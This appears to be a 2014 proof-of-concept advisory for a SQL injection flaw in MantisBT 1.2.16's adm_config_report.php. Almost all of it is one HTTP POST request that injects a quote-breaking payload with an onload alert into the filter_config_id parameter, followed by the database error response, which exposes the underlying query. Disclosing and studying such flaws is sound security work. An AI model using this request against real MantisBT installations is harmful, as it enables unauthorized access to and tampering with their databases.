# ==============================================================
# Title ...| MantisBT 1.2.16
# Version .| 1.2.16
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.mantisbt.org
# ==============================================================
[+] for authorized user
# ==============================================================
# SQL Injection
---<request>---
POST /k/cms/mantis/mantisbt-1.2.16/adm_config_report.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 135
save=1&filter_user_id=0&filter_project_id=0&filter_config_id='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&apply_filter_button=Apply+Filter
---<request>---
---<response>---
<br /><div align="center"><table class="width50" cellspacing="1"><tr><td class="form-title">APPLICATION ERROR #401</td></tr><tr><td><p class="center" style="color:red">Database query failed. Error received from database was #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>' <br />
ORDER BY user_id, project_id, config_id' at line 3 for the query: SELECT config_id, user_id, project_id, type, value, access_reqd<br />
FROM mantis_config_table<br />
WHERE 1=1 AND user_id = 0 AND project_id = 0 AND config_id = ''>"><body/onload=alert(9999)>' <br />
ORDER BY user_id, project_id, config_id .</p></td></tr><tr><td><p class="center">Please use the "Back" button in your web browser to return to the previous page. There you can correct whatever problems were identified in this error or select another action. You can also click an option from the menu bar to go directly to a new section.</p></td></tr></table></div></body>
</html>
---<response>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/